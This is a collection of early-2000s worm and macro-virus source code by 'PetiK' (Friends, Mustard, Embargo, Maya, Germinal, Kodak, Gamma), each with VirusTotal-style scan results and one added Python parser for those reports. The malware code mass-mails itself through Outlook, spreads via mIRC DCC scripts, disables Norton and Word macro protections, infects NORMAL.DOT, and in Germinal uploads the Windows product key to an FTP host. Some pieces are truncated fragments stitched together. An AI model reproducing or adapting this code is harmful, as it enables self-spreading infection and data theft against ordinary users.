db 'Set L = K.GetNameSpace("MAPI")',0dh,0ah
db 'For Each M In L.AddressLists',0dh,0ah
db 'If M.AddressEntries.Count <> 0 Then',0dh,0ah
db 'For O = 1 To M.AddressEntries.Count',0dh,0ah
db 'Set P = M.AddressEntries(O)',0dh,0ah
db 'Next',0dh,0ah
db 'Set N = K.CreateItem(0)',0dh,0ah
db 'N.Subject = "Would you like a Net Friend ?"',0dh,0ah
db 'N.Body = "Look at this zip file to find a Net Friend"',0dh,0ah
db 'Set Q = CreateObject("Scripting.FileSystemObject")',0dh,0ah
db 'N.Attachments.Add Q.BuildPath(Q.GetSpecialFolder(1),"NetFriends.exe")',0dh,0ah
db 'If N.To <> "" Then',0dh,0ah
db 'N.Send',0dh,0ah
db 'End If',0dh,0ah
db 'End If',0dh,0ah
db 'Next',0dh,0ah
MAYATAILLE equ $-mayad
.code
DEBUT:
PREPAR: push 50
push offset szCopie
call GetSystemDirectoryA
push offset Copie
push offset szCopie
call lstrcat
FILE: push 50 ; Create PetiK in \%WINDIR%, a mIRC script
push offset szPTK
call GetWindowsDirectoryA
push offset inifile
push offset szPTK
call lstrcat
push 00h
push FILE_ATTRIBUTE_READONLY
push CREATE_NEW
push 00h
push FILE_SHARE_READ
push GENERIC_WRITE
push offset szPTK ; success ? continue
call CreateFileA
cmp eax,-1
je BDR ; or else, jump to label BDR
mov [FileHandle],eax
push 00h
push offset octets
push PETIKTAILLE
push offset petikd
push [FileHandle]
call WriteFile
push [FileHandle]
call CloseHandle ; the file is create
push 02h
push offset OWN_D
push offset REG_SZ
push 00h
push offset OWN_S
push [RegHandle]
call RegSetValueExA ; Change the name of Registered Owner
push 02h
push offset ORG_D
push offset REG_SZ
push 00h
push offset ORG_S
push [RegHandle]
call RegSetValueExA ; Change the name of Registered Organization
push [RegHandle]
call RegCloseKey
end DEBUT
File Friends.exe received on 05.16.2009 11:58:15 (CET)
Antivirus Version Last Update Result
a-squared 4.0.0.101 2009.05.16 Email-Worm.Win32.Petik!IK
AhnLab-V3 5.0.0.2 2009.05.15 Win32/PetTick.6656
AntiVir 7.9.0.168 2009.05.15 Worm/Petik.15
Antiy-AVL 2.0.3.1 2009.05.15 Worm/Win32.Win32
Authentium 5.1.2.4 2009.05.15 W32/Malware!543d
Avast 4.8.1335.0 2009.05.15 Win32:PetiK-Friends
AVG 8.5.0.336 2009.05.15 I-Worm/Petik.B
BitDefender 7.2 2009.05.16 Generic.Malware.IM.34A9CFBA
CAT-QuickHeal 10.00 2009.05.15 W32.Petik.B
ClamAV 0.94.1 2009.05.15 W32.PetTick
Comodo 1157 2009.05.08 -
DrWeb 5.0.0.12182 2009.05.16 Win32.Petik.6656
eSafe 7.0.17.0 2009.05.14 -
eTrust-Vet 31.6.6508 2009.05.16 Win32/Petik.6656.A
F-Prot 4.4.4.56 2009.05.15 W32/Malware!543d
F-Secure 8.0.14470.0 2009.05.15 Email-Worm.Win32.Petik
Fortinet 3.117.0.0 2009.05.16 W32/PetTick.B@mm
GData 19 2009.05.16 Generic.Malware.IM.34A9CFBA
Ikarus T3.1.1.49.0 2009.05.16 Email-Worm.Win32.Petik
K7AntiVirus 7.10.735 2009.05.14 Email-Worm.Win32.Petik
Kaspersky 7.0.0.125 2009.05.16 Email-Worm.Win32.Petik
McAfee 5616 2009.05.15 W32/PetTick@MM
McAfee+Artemis 5616 2009.05.15 W32/PetTick@MM
McAfee-GW-Edition 6.7.6 2009.05.15 Worm.Petik.15
Microsoft 1.4602 2009.05.16 Worm:Win32/Petik.B
NOD32 4080 2009.05.15 Win32/Petik.B
Norman 6.01.05 2009.05.16 W32/Pet_Tick.6656.B
nProtect 2009.1.8.0 2009.05.16 Worm/W32.Petik.6656.C
Panda 10.0.0.14 2009.05.16 W32/Petik.B
PCTools 4.4.2.0 2009.05.15 VBS.LoveLetter
Prevx 3.0 2009.05.16 -
Rising 21.29.52.00 2009.05.16 Worm.Mail.Petik.v
Sophos 4.41.0 2009.05.16 W32/Petik-B
Sunbelt 3.2.1858.2 2009.05.16 Friends worm
Symantec 1.4.4.12 2009.05.16 W95.Pet_Tick.gen
TheHacker 6.3.4.1.326 2009.05.15 W32/PetTick@MM
TrendMicro 8.950.0.1092 2009.05.15 WORM_PET.TICK.B
VBA32 3.12.10.5 2009.05.16 Win32.Worm.Petik.8192
ViRobot 2009.5.15.1737 2009.05.15 I-Worm.Win32.PetTick.6656.A
VirusBuster 4.6.5.0 2009.05.15 VBS.LoveLetter
Additional information
File size: 6656 bytes
MD5...: 18651c3df28058b96d1297d1568d4fd8
SHA1..: b6689d3f64f47909b219b4a17fcae7c3f6567fd8
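The scan reports in this archive list one engine per line as engine, version, signature date and result, with "-" meaning no detection. The following Python script is an added example (not part of PetiK's archive) that parses that layout into per-engine verdicts, computes the detection ratio and tallies the family name fragments the vendors agree on; the sample lines are a subset copied from the Friends.exe report above.

```python
"""Parse a flattened VirusTotal-style scan report into per-engine verdicts.

Added example, not part of the archive. Each engine line has the shape
"<engine> <version> <YYYY.MM.DD> <result>", where "-" means no detection.
"""
import re
from collections import Counter

# One engine per line; the result may itself contain spaces ("Friends worm").
LINE_RE = re.compile(
    r"^(?P<engine>\S+)\s+(?P<version>\S+)\s+"
    r"(?P<updated>\d{4}\.\d{2}\.\d{2})\s+(?P<result>.+?)\s*$"
)

# Subset of the Friends.exe report above; the header line is kept on purpose
# to show that it is skipped by the parser.
SAMPLE_REPORT = """\
Antivirus Version Last Update Result
a-squared 4.0.0.101 2009.05.16 Email-Worm.Win32.Petik!IK
Avast 4.8.1335.0 2009.05.15 Win32:PetiK-Friends
Comodo 1157 2009.05.08 -
Kaspersky 7.0.0.125 2009.05.16 Email-Worm.Win32.Petik
PCTools 4.4.2.0 2009.05.15 VBS.LoveLetter
Prevx 3.0 2009.05.16 -
Sunbelt 3.2.1858.2 2009.05.16 Friends worm
"""

# Name fragments that say nothing about the family; dropped from the tally.
GENERIC = {"email", "worm", "generic", "malware", "virus", "trojan"}


def parse_report(text):
    """Return one dict per engine line; header and trailer lines are skipped."""
    rows = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # "Antivirus Version ..." header, "Additional information", etc.
        row = m.groupdict()
        row["detected"] = row["result"] != "-"
        rows.append(row)
    return rows


def detection_ratio(rows):
    """Return (engines that detected, engines queried)."""
    return sum(1 for r in rows if r["detected"]), len(rows)


def family_tokens(rows):
    """Tally the non-generic, alphabetic name fragments across detecting engines.

    Each engine contributes a fragment at most once, so the count is the
    number of vendors using that fragment, a rough consensus indicator.
    """
    tally = Counter()
    for r in rows:
        if not r["detected"]:
            continue
        seen = set()
        for tok in re.split(r"[^A-Za-z]+", r["result"]):
            tok = tok.lower()
            if len(tok) >= 4 and tok not in GENERIC and tok not in seen:
                seen.add(tok)
                tally[tok] += 1
    return tally


def summarize(text):
    """Detection ratio plus the three most agreed-upon family fragments."""
    rows = parse_report(text)
    hit, total = detection_ratio(rows)
    return {"detected": hit, "engines": total,
            "families": family_tokens(rows).most_common(3)}


if __name__ == "__main__":
    print(summarize(SAMPLE_REPORT))
```

The disagreement visible in the full report (PetTick, Petik, Friends and even LoveLetter for the same file) is why a triage script should reason about the ratio and the consensus fragment rather than trust any single vendor name.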
comment #
Name : I-Worm.Mustard
Author : PetiK
Date : May 10th - 27th
Size : 7168 bytes
Action : When the worm is first executed, it creates the key HKCU\Software\[PetiK].
Then it copies itself to Windows\AVUpdate.exe and alters the run= line in the Win.ini
file to :
run=Windows\AVUpdate.exe. It tries to delete the value "Norton Auto-Protect" in the
Run key of the registry. If that succeeds, it alters "Exclude.dat" so that the VBS file
is not scanned by Norton Antivirus. It shows a message box and reboots the computer. On
the next start, it creates a VBS worm with the attributes "readonly" and "hidden".
On June 17th, it shows a message box.
.386
jumps
locals
.model flat,stdcall
extrn CloseHandle:PROC
extrn CopyFileA:PROC
extrn CreateFileA:PROC
extrn DeleteFileA:PROC
extrn ExitProcess:PROC
extrn ExitWindowsEx:PROC
extrn GetFileAttributesA:PROC
extrn GetModuleFileNameA:PROC
extrn GetModuleHandleA:PROC
extrn GetSystemTime:PROC
extrn GetWindowsDirectoryA:PROC
extrn lstrcat:PROC
extrn MessageBoxA:PROC
extrn RegCreateKeyExA:PROC
extrn RegOpenKeyExA:PROC
extrn RegDeleteValueA:PROC
extrn RegQueryValueExA:PROC
extrn RegCloseKey:PROC
extrn SetFileAttributesA:PROC
extrn SetFilePointer:PROC
extrn Sleep:PROC
extrn WinExec:PROC
extrn WriteFile:PROC
extrn WritePrivateProfileStringA:PROC
.data
FileHandle dd ?
RegHandle dd ?
octets dd ?
regDisp dd 0
regResu dd 0
Dist dd 0
szNOR db 50 dup (0)
szOrig db 50 dup (0)
szWin db 50 dup (0)
Buffer db 7Fh dup (0)
BufferSize dd 7Fh
run db "run",00h
windows db "windows",00h
Winini db "\\WIN.INI",00h
Copie db "\AVUpdate.exe",00h
filedat db "\Exclude.dat",00h
email db "wscript C:\send.vbs",00h
VBS db "C:\send.vbs",00h
mirc db "C:\Win.sys",00h
script1 db "C:\mirc\script.ini",00h
script2 db "C:\mirc32\script.ini",00h
script3 db "C:\Program Files\mirc\script.ini",00h
script4 db "C:\Program Files\mirc32\script.ini",00h
CLE db "Software\[PetiK]",00h
TITRE db "Install Information",00h
TEXTE db "Please reboot your computer to finish the installation",00h
CLE_RUN db "Software\Microsoft\Windows\CurrentVersion\Run",00h
NAV db "Norton Auto-Protect",00h
CLE_NOR db "\Software\Symantec\InstalledApps",00h
ValueType dd 00h
Value db "NAV",00h
CREE db "I-Worm.Mustard par PetiK (c)2001",00h
TITRE2 db "I-Worm.Mustard",00h
TEXTE2 db " Coded By PetiK (c)2001 ",0dh,0ah
db "",0dh,0ah
db "Small but Pretty",0dh,0ah
db "I Love You",0dh,0ah
db "Since January",0dh,0ah
db "I Think Of You",00h
SYSTIME struct
wYear WORD ?
wMonth WORD ?
wDayOfWeek WORD ?
wDay WORD ?
wHour WORD ?
wMinute WORD ?
wSecond WORD ?
wMillisecond WORD ?
SYSTIME ends
SystemTime SYSTIME <>
mircd:
db "[script]",0dh,0ah
db "n0=on 1:JOIN:#:{",0dh,0ah
db "n1= /if ( $nick == $me ) { halt }",0dh,0ah
db "n2= ./dcc send $nick "
szCopie db 50 dup (0)
db "",0dh,0ah
db "n3=}",00h
MIRCTAILLE equ $-mircd
sendd:
db 'ENTREE()',0dh,0ah
db 'Sub ENTREE',0dh,0ah
db 'EMAIL()',0dh,0ah
db 'End Sub',0dh,0ah
db 'Sub EMAIL()',0dh,0ah
db 'Set K = CreateObject("Outlook.Application")',0dh,0ah
db 'Set L = K.GetNameSpace("MAPI")',0dh,0ah
db 'For Each M In L.AddressLists',0dh,0ah
db 'If M.AddressEntries.Count <> 0 Then',0dh,0ah
db 'For O = 1 To M.AddressEntries.Count',0dh,0ah
db 'Set P = M.AddressEntries(O)',0dh,0ah
db 'Set N = K.CreateItem(0)',0dh,0ah
db 'N.To = P.Address',0dh,0ah
db 'N.Subject = "AntiVirus Update"',0dh,0ah
db 'N.Body = "The last version of your AV"',0dh,0ah
db 'Set Q = CreateObject("Scripting.FileSystemObject")',0dh,0ah
db 'N.Attachments.Add Q.BuildPath(Q.GetSpecialFolder(0),"AVUpdate.exe")',0dh,0ah
db 'N.DeleteAfterSubmit = True',0dh,0ah
db 'If N.To <> "" Then',0dh,0ah
db 'N.Send',0dh,0ah
db 'End If',0dh,0ah
db 'Next',0dh,0ah
db 'End If',0dh,0ah
db 'Next',0dh,0ah
db 'End Sub',0dh,0ah
SENDTAILLE equ $-sendd
datd:
db
02Ah,02Eh,076h,062h,073h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
,000h
db
000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
,000h
db
000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
,000h
db
000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
,000h
db
000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
,000h
db
000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
,000h
db
000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
,000h
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,001h,0E6h,003h
DATTAILLE equ $-datd
.code
DEBUT:
VERIF: push offset regDisp
push offset regResu
push 00h
push 0F003Fh
push 00h
push 00h ; HKCU\Software\[PetiK] exist ?
push 00h
push offset CLE
push HKEY_CURRNET_USER
call RegCreateKeyExA
push [regResu]
call RegCloseKey
cmp [regDisp],1
jne EMAIL ; YES => EMAIL
push [RegHandle]
call RegCloseKey
NORTON: push offset RegHandle
push 001F0000h
push 00h
push offset CLE_NOR
push HKEY_LOCAL_MACHINE
call RegOpenKeyExA
test eax,eax
jnz FIN
push offset BufferSize
push offset Buffer
push offset ValueType
push 00h ; Search the "InstallDir" of Norton
push offset Value
push RegHandle
call RegQueryValueExA
push [RegHandle]
call RegCloseKey
push 5000
call Sleep ; Wait 5 seconds
push FILE_ATTRIBUTE_READONLY
push offset Buffer
call SetFileAttributesA ; Attribute read only for the file
MESSAGE:push 40h
push offset TITRE
push offset TEXTE
push 00h
call MessageBoxA
end DEBUT
File Mustard.exe received on 05.16.2009 17:59:52 (CET)
Additional information
File size: 7168 bytes
MD5...: 2aae09e21d35fd56f7aa0f603dcb6151
SHA1..: 4fbe3b2758bdb50ea45bb4593f074239c30bdd5d
<--
Name : HTML.Embargo
Author : PetiK
Language : HTML/VBS
-->
<embargo>
<HTML><HEAD><TITLE>WinHelp</TITLE></HEAD>
<BODY bgColor=#ffffff>
<SCRIPT Language=VBScript>
On Error Resume Next
Set fso=CreateObject("Scripting.FileSystemObject")
Set ws=CreateObject("WScript.Shell")
Set original=document.body.createTextRange
Set copie=fso.CreateTextFile(fso.GetSpecialFolder(0)&"\WinHelp.htm")
copie.WriteLine "<embargo>"
copie.WriteLine "<HTML><HEAD><TITLE>WinHelp</TITLE></HEAD>"
copie.WriteLine "<BODY bgColor=#ffffff>"
copie.WriteLine original.htmltext
copie.WriteLine "</BODY></HTML>"
copie.Close()
reg=ws.RegRead("HKLM\Software\HTML.Embargo\")
If reg <> "c parti" Then
Set auto=fso.OpenTextFile("C:\autoexec.bat", 1, False, False)
tout=auto.ReadAll
Set nouveau= fso.CreateTextFile("C:\autoexec.bat", True, False)
nouveau.Write(tout)
nouveau.WriteLine ""
nouveau.WriteLine "@echo off"
nouveau.WriteLine ":embargo"
nouveau.WriteLine "cls"
nouveau.WriteLine "echo This is the signature of my new virus"
nouveau.WriteLine "echo."
nouveau.WriteLine "echo HTML.Embargo by PetiK"
nouveau.WriteLine "echo Made In France (c)2001"
nouveau.WriteLine "pause"
nouveau.WriteLine "goto embargo"
nouveau.Close()
ws.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start
Page",fso.GetSpecialFolder(0)&"\WinHelp.htm"
ws.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\FullScreen","yes"
ws.RegWrite "HKLM\Software\HTML.Embargo\","c parti"
End If
reg=ws.RegRead("HKLM\Software\HTML.Embargo\mirc")
If reg <> "c parti" Then
PFD=ws.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\ProgramFilesDir")
If dossier = "" Then
If fso.FileExists("c:\mirc\mirc.ini") Then dossier = "c:\mirc"
If fso.FileExists("c:\mirc32\mirc.ini") Then dossier = "c:\mirc32"
If fso.FileExists(PFD & "\mirc\mirc.ini") Then dossier = PFD & "\mirc"
If fso.FileExists(PFD & "\mirc32\mirc.ini") Then dossier = PFD & "\mirc32"
End If
If dossier <> "" Then
Set script = fso.CreateTextFile(dossier & "\script.ini", True)
script.WriteLine "[script]"
script.WriteLine "n0=on 1:JOIN:#:{"
script.WriteLine "n1= /if ( $nick == &me ) (halt)"
script.WriteLine "n2= ./dcc send $nick " & fso.GetSpecialFolder(0)&"\WinHelp.htm"
script.WriteLine "n3=}"
ws.RegWrite "HKLM\Software\HTML.Embargo\mirc","c parti"
End If
Additional information
File size: 4085 bytes
MD5...: 4ec0004fb7f700df736ae4d3c2c22919
SHA1..: 464dec7db3865638af142f5e8929fcd49e5af667
' Worm Name : W97M.Maya.A
' Author : PetiK
' Language : VBA Word
' Date : May 29th – June 1st 2001
' Size : 33792 – 33280 (with change) bytes
'
'
'
' Changes the properties of the document. If the value "W97M.Maya" does not exist in
' the key HKLM\Software\, the worm copies itself to C:\Windows\Maya.doc. It creates
' the "C:\Maya" directory with a TXT file and a script file to infect mIRC
' channels. Then it spreads with Microsoft Outlook.
' Subject : "Hi man, it's " + user name
' Body : "This is the new net Story"
' "It's great"
' Attachment : Maya.doc
' On the 5th of the month, when the document is closed, a message box appears.
' When the Visual Basic editor is opened, another message box appears and the worm
' adds a value to the Run key of the registry to disable the mouse.
Sub AutoOpen()
On Error Resume Next
With Dialogs(wdDialogFileSummaryInfo)
.Author = "PetiK"
.Title = "W97M.Maya"
.Comments = "To my best GirlFriend"
.Keywords = "Maya, Bzzbzz, to grow"
.Execute
End With
ActiveDocument.SaveAs FileName:="C:\Windows\Maya.doc"
ActiveDocument.Saved = True
FileSystem.MkDir "C:\Maya"
Open "C:\Maya\hello.txt" For Output As #1
Print #1, "Le 29 mai 2001 à Munster"
Print #1, "This is my first W97M.Outlook.Worm"
Print #1, "Its name is W97M.Maya"
Close #1
Open "C:\Maya\script.ini" For Output As #1
Print #1, "n0=on 1:JOIN:#:{"
Print #1, "n1= /if ( $nick == $me ) { halt }"
Print #1, "n2= /.dcc send $nick C:\Windows\Maya.doc"
Print #1, "n3=}"
Close #1
FileSystem.FileCopy "C:\Maya\script.ini", "C:\mirc\script.ini"
FileSystem.FileCopy "C:\Maya\script.ini", "C:\mirc32\script.ini"
FileSystem.FileCopy "C:\Maya\script.ini", "C:\progra~1\mirc\script.ini"
FileSystem.FileCopy "C:\Maya\script.ini", "C:\progra~1\mirc32\script.ini"
FileSystem.Kill "C:\Maya\script.ini"
End Sub
Sub AutoClose()
If Day(Now) = 5 Then
MsgBox "Coded by PetiK (c)2001", vbInformation, "W97M.Maya"
End If
End Sub
Sub ViewVBCode()
System.PrivateProfileString("",
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run", "MayAttack") =
"rundll32 mouse,disable"
MsgBox "Curiosity is bad" + vbCr + vbCr + "With her small size" + vbCr + "Maya is alwayas
there", vbCritical, "W97M.Maya"
ShowVisualBasicEditor = True
End Sub
File Maya.doc received on 05.16.2009 17:59:46 (CET)
Antivirus Version Last Update Result
a-squared 4.0.0.101 2009.05.16 Virus.MSWord.Melissa-based!IK
AhnLab-V3 5.0.0.2 2009.05.16 W97M/Unnamed
AntiVir 7.9.0.168 2009.05.15 W2000M/Ayam.A@mm
Antiy-AVL 2.0.3.1 2009.05.15 Virus/MSWord.MSWord
Authentium 5.1.2.4 2009.05.16 W97M/Ayam.A@mm
Avast 4.8.1335.0 2009.05.15 MW97:Ayam family
AVG 8.5.0.336 2009.05.15 BAT/Generic
BitDefender 7.2 2009.05.16 W97M.Ayam.A@mm
CAT-QuickHeal 10.00 2009.05.15 W97M.Prilissa
ClamAV 0.94.1 2009.05.16 W97M.Ayam.A
Comodo 1157 2009.05.08 Virus.MSWord.Melissabased
DrWeb 5.0.0.12182 2009.05.16 X97M.Papa
eSafe 7.0.17.0 2009.05.14 O97M.GNsm
eTrust-Vet 31.6.6508 2009.05.16 W97M/Ayam.A:mm
F-Prot 4.4.4.56 2009.05.16 W97M/Ayam.A@mm
F-Secure 8.0.14470.0 2009.05.15 Virus.MSWord.Melissa-based
Fortinet 3.117.0.0 2009.05.16 W97M/Ayam.A@MM
GData 19 2009.05.16 W97M.Ayam.A@mm
Ikarus T3.1.1.49.0 2009.05.16 Virus.MSWord.Melissa-based
K7AntiVirus 7.10.737 2009.05.16 Macro.Melissa-based
Kaspersky 7.0.0.125 2009.05.16 Virus.MSWord.Melissa-based
McAfee 5616 2009.05.15 W97M/Generic@MM
McAfee+Artemis 5616 2009.05.15 W97M/Generic@MM
McAfee-GW-Edition 6.7.6 2009.05.15 Macro.Ayam.A
Microsoft 1.4602 2009.05.16 Virus:W97M/Ayam.A@mm
NOD32 4080 2009.05.15 W97M/Ayam.A
Norman 6.01.05 2009.05.16 W97M/Ayam.A
nProtect 2009.1.8.0 2009.05.16 W97M.Ayam.A@mm
Panda 10.0.0.14 2009.05.16 W97M/Maya.Worm
PCTools 4.4.2.0 2009.05.16 WORD.97.Maya.B
Prevx 3.0 2009.05.16 -
Rising 21.29.52.00 2009.05.16 Macro.Office.Melissa-based.aa
Sophos 4.41.0 2009.05.16 WM97/Munster-A
Sunbelt 3.2.1858.2 2009.05.16 Virus.MSWord.Melissa-based (v)
Symantec 1.4.4.12 2009.05.16 W97M.OutlookWorm.Gen
TheHacker 6.3.4.1.326 2009.05.15 W2KM/Sin
TrendMicro 8.950.0.1092 2009.05.15 W97M_AYAM.A
VBA32 3.12.10.5 2009.05.16 Virus.X97M.Papa
ViRobot 2009.5.15.1737 2009.05.15 W97M.Ayam.A
VirusBuster 4.6.5.0 2009.05.16 WORD.97.Maya.B
Additional information
File size: 33280 bytes
MD5...: ebe499343061e49ea4f31639fc3a7e59
SHA1..: 89de7abdbdc3fc8764d481a49125b8a3cebf6f05
// Name : JS.Germinal.A@mm
// Author : PetiK
// Date : June 1st – 2nd 2001
// Language : JScript
// Size of infection : 2357 bytes
// Action : It infects all *.JS files in the \WINDOWS, \WINDOWS\DESKTOP
// and \WINDOWS\SAMPLES\WSH folders.
// It creates a TXT file with system information and sends it to an FTP server.
// JS.Germinal.A@mm
var WS=WScript.CreateObject("WScript.Shell")
var fso=WScript.CreateObject("Scripting.FileSystemObject")
var win=fso.GetSpecialFolder(0)
var c=fso.OpenTextFile(WScript.ScriptFullName,1)
var virus=c.ReadAll()
var nom=WS.RegRead
("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RegisteredOwner")
var org=WS.RegRead
("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RegisteredOrganization")
var id=WS.RegRead ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\ProductId")
var key=WS.RegRead ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\ProductKey")
var ver=WS.RegRead ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Version")
var vernum=WS.RegRead
("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\VersionNumber")
var txt=fso.CreateTextFile("C:\\"+nom+".txt",2)
txt.WriteLine ("Information de " + nom + " à " + org);
txt.WriteLine ("");
txt.WriteLine ("Numéro d'identification : " + id);
txt.WriteLine ("Numéro de la clé : " + key);
txt.WriteLine ("Version de windows : " + ver + " " + vernum);
txt.Close()
var drv=fso.CreateTextFile(win+"\\PetiK.drv",2)
drv.WriteLine ("open");
drv.WriteLine ("members.aol.com");
drv.WriteLine ("pentasm99");
drv.WriteLine ("ascii")
drv.WriteLine ("put C:\\"+nom+".txt");
drv.WriteLine ("bye");
drv.WriteLine ("exit");
drv.Close()
WS.Run ("command.com /c ftp.exe -i -v -s:"+win+"\\PetiK.drv")
Additional information
File size: 2357 bytes
MD5...: b90254895d6169a8d111a508e2638c51
SHA1..: 7669c66d338b4208536c32924bcab95996cf8c3e
' Name : W97M.Kodak
' Author : PetiK
' Date : June 5th 2001
' Size 3,030 bytes
'
' Macro AutoOpen : Creates a "script.ini" file for mIRC. If the day is the 5th,
' the virus displays a balloon message. It copies itself to /Windows/Kodak.doc.
'
' Macro AutoClose : It alters the macro security level of Word 9.0 and 10.0 (2000 and XP).
' It copies its code into the file "Kodak.vxd" and imports it into "NORMAL.DOT".
' When a new file is created, the code of the macro is written into that file.
' To avoid infecting "NORMAL.DOT" twice, the virus adds the value :
' HKEY_LOCAL_MACHINE\Software\Microsoft\W97M.Kodak = ClicClac
'
' Macro HelpAbout : Displays another balloon message
'
' Macro ViewVBCode : Displays a message box and shows the Visual Basic Editor
'
' Macro ToolsOptions and Security : Find out for yourself.
Sub AutoClose()
If System.PrivateProfileString("",
"HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> 1& Then
System.PrivateProfileString("",
"HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
End If
If System.PrivateProfileString("",
"HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security", "Level") <> 1& Then
System.PrivateProfileString("",
"HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security", "Level") = 1&
End If
If Dir("C:\Kodak.vxd", vbReadOnly) = "" Then
Open "C:\Kodak.vxd" For Output As #1
For i = 1 To MacroContainer.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
K = MacroContainer.VBProject.VBComponents.Item(1).CodeModule.Lines(i, 1)
Print #1, K
Next i
Close #1
SetAttr "C:\Kodak.vxd", vbReadOnly
End If
If System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\",
"W97M.Kodak") <> "ClicClac" Then
NormalTemplate.VBProject.VBComponents.Import "C:\Kodak.vxd"
NormalTemplate.Save
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\", "W97M.Kodak") =
"ClicClac"
End If
ActiveDocument.VBProject.VBComponents.Import "C:\Kodak.vxd"
ActiveDocument.Save
End Sub
Sub HelpAbout()
With Application.Assistant
.Visible = True
End With
With Assistant.NewBalloon
.Text = "Smile and cheese for the photo"
.Heading = "W97M.Kodak"
.Animation = msoAnimationGetAttentionMajor
.Button = msoButtonSetOK
.Show
End With
End Sub
Sub ViewVBCode()
MsgBox "was coded by PetiK(c)2001", vbInformation, "W97M.Kodak"
ShowVisualBasicEditor = True
End Sub
Sub ToolsOptions()
On Error Resume Next
Options.VirusProtection = 1
Options.SaveNormalPrompt = 1
Dialogs(wdDialogToolsOptions).Show
Options.VirusProtection = 0
Options.SaveNormalPrompt = 0
End Sub
Sub ToolsSecurity()
On Error Resume Next
CommandBars("Macro").Controls("Security...").Enabled = True
Dialogs(wdDialogToolsSecurity).Show
CommandBars("Macro").Controls("Security...").Enabled = False
End Sub
File Kodak.doc received on 05.16.2009 17:43:05 (CET)
Antivirus Version Last Update Result
a-squared 4.0.0.101 2009.05.16 Virus.MSWord.Adok!IK
AhnLab-V3 5.0.0.2 2009.05.16 W97M/Adok
AntiVir 7.9.0.168 2009.05.15 W2000M/Petman.A
Antiy-AVL 2.0.3.1 2009.05.15 Virus/MSWord.MSWord
Authentium 5.1.2.4 2009.05.16 W97M/Adok.A
Avast 4.8.1335.0 2009.05.15 MW97:Adok-A
AVG 8.5.0.336 2009.05.15 W97M/Ethan
BitDefender 7.2 2009.05.16 W97M.Kdk.A
CAT-QuickHeal 10.00 2009.05.15 W97M.ZMK.M
ClamAV 0.94.1 2009.05.16 WM.Psycho
Comodo 1157 2009.05.08 Virus.MSWord.Adok
DrWeb 5.0.0.12182 2009.05.16 W97M.Petik
eSafe 7.0.17.0 2009.05.14 O97M.GNcc
eTrust-Vet 31.6.6508 2009.05.16 W97M/Adok.A
F-Prot 4.4.4.56 2009.05.16 W97M/Adok.A
F-Secure 8.0.14470.0 2009.05.15 Virus.MSWord.Adok
Fortinet 3.117.0.0 2009.05.16 W97M/Adok.A
GData 19 2009.05.16 W97M.Kdk.A
Ikarus T3.1.1.49.0 2009.05.16 Virus.MSWord.Adok
K7AntiVirus 7.10.737 2009.05.16 Macro.Adok
Kaspersky 7.0.0.125 2009.05.16 Virus.MSWord.Adok
McAfee 5616 2009.05.15 W97M/Generic
McAfee+Artemis 5616 2009.05.15 W97M/Generic
McAfee-GW-Edition 6.7.6 2009.05.15 Macro.Petman.A
Microsoft 1.4602 2009.05.16 Virus:W97M/Adok.A
NOD32 4080 2009.05.15 W97M/Adok.A
Norman 6.01.05 2009.05.16 W97M/Adok.A
nProtect 2009.1.8.0 2009.05.16 W97M.Kdk.A
Panda 10.0.0.14 2009.05.16 W97M/Kodak.worm
PCTools 4.4.2.0 2009.05.16 WORD.97.Adok.A
Prevx 3.0 2009.05.16 -
Rising 21.29.52.00 2009.05.16 Macro.Word97.Adok
Sophos 4.41.0 2009.05.16 WM97/Adok-A
Sunbelt 3.2.1858.2 2009.05.16 W97M.Adok (v)
Symantec 1.4.4.12 2009.05.16 W97M.Adok.A
TheHacker 6.3.4.1.326 2009.05.15 W2KM/Generico
TrendMicro 8.950.0.1092 2009.05.15 W97M_ABOTUS.A
VBA32 3.12.10.5 2009.05.16 Virus.W97M.Ethan
ViRobot 2009.5.15.1737 2009.05.15 W97M.Adok
VirusBuster 4.6.5.0 2009.05.16 WORD.97.Adok.A
Additional information
File size: 31232 bytes
MD5...: 84a74bcf024ac4779d20e2b667bc6da6
SHA1..: 99cbae9ae51381d5f7eb637b12d42e790f48db33
comment #
Name : I-Worm.Gamma (w32gammaworm)
Author : PetiK
Date : May 29th - June 9th
Size : 8704 bytes
Action : Checks whether the file is /WINDOWS/SYSTEM.SETUP.EXE. If it is not, it
copies itself to /WINDOWS/SYSTEM.SETUP.EXE, alters the run= line in the Win.ini file to
the name of the copy and displays a message.
Otherwise, it creates C:\gamma and copies it to C:\mirc, C:\mirc32, C:\progra~1\mirc or
C:\progra~1\mirc32. Then it creates C:\Data and puts a file info.vbs there. This file
sends a message to gamma@multimania.com :
On the 5th, when the day is a Wednesday, a message is displayed. When the user clicks on
"OK", the worm swaps the buttons of the mouse.
